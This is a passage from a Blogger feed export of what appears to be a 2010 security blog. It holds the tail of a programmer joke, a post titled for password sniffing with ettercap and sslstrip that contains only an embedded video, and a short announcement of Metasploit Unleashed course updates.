and say "Ticket please". The MS programmers slide the ticket under the door, as they saw the Java programmers do earlier.<br/><br/>"Thank you", they say. 
"You steal our methods, but you don't understand them."sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com1tag:blogger.com,1999:blog-6983143534824228892.post-46572550878868850422010-08-29T10:03:00.000-07:002012-12-29T03:36:38.760-08:00Advanced password sniffing using ettercap and sslstrip<embed src="http://blip.tv/play/AYH49HwA" type="application/x-shockwave-flash" width="450" height="400" allowscriptaccess="always" allowfullscreen="true"></embed>sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com0tag:blogger.com,1999:blog-6983143534824228892.post-91261687508090638382010-08-27T00:45:00.000-07:002012-12-29T03:36:38.788-08:00Metasploit Unleashed – UpdatesSo I guess the rumors are true :) the Metasploit Unleashed course will be updated on a monthly basis.<br/>We can expect a whole lot of new content being added onto the Metasploit Unleashed Wiki in the next few months, for now they have added 9 new sections.<br/><br/>You can find the course at : <a href="http://www.offensive-security.com/metasploit-unleashed/">Metasploit_unleashed</a><br/>Source: <a href="http://www.offensive-security.com/metasploit-unleashed-training/metasploit-unleashed-updates/">www.offensive-security.com</a>sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com0